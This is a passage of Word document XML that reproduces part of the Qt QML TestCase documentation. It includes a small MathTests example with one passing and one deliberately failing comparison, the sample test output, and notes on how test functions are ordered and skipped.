          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1937" w:history="1">
        <w:r w:rsidRPr="002E1325">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TestCase</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1938" w:history="1">
        <w:r w:rsidRPr="00302D13">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtQuick</w:t>
        </w:r>
      </w:hyperlink>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2.0</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1939" w:history="1">
        <w:r w:rsidRPr="00302D13">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtTest</w:t>
        </w:r>
      </w:hyperlink>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1.0</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TestCase</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name</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"MathTests"</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function</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> test_math</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compare</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</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2</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4</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"2 + 2 = 4"</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function</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> test_fail</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compare</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</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2</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5</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"2 + 2 = 5"</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Functions whose names start with "test_"</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are treated as test cases to be executed. The</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1940" w:anchor="name-prop" w:history="1">
        <w:r w:rsidRPr="00302D13">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>name</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property is used to prefix the functions in the output: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Start</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> testing of </w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MathTests</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Config</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Using</w:t>
      </w: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QTest</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> library </w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4.7</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</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hyperlink r:id="rId1941" w:history="1">
        <w:r w:rsidRPr="00302D13">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt</w:t>
        </w:r>
      </w:hyperlink>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4.7</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</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PASS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MathTests</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initTestCase</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FAIL</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MathTests</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test_fail</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2</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2</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5</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Actual</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4</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Expected</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5</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Loc</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/home/</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tst_math</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qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>12</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PASS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MathTests</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test_math</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PASS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MathTests</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cleanupTestCase</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Totals</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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> passed</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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> failed</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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> skipped</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302D13" w:rsidRPr="00302D13" w:rsidRDefault="00302D13" w:rsidP="00302D13">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Finished</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> testing of </w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MathTests</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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Because of the </w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>way JavaScript properties work</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>order</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in which the test </w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are found is </w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unpredictable</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. To </w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>assist with predictability, the test framework will sort the functions on ascending order of name</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This can </w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>help when</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> there are two tests that must be run in order.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302D13" w:rsidRPr="00302D13" w:rsidRDefault="00302D13" w:rsidP="00302D13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Multiple</w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1942" w:history="1">
        <w:r w:rsidRPr="002E1325">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TestCase</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>types can be supplied</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The test program will exit once they have all completed. If a test case doesn't need to run (because a precondition has failed), then</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1943" w:anchor="optional-prop" w:history="1">
        <w:r w:rsidRPr="002E1325">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>optional</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be set to true.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302D13" w:rsidRPr="00302D13" w:rsidRDefault="00302D13" w:rsidP="00A724CC">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1580" w:name="data-driven-tests"/>
      <w:bookmarkStart w:id="1581" w:name="_Toc483000873"/>
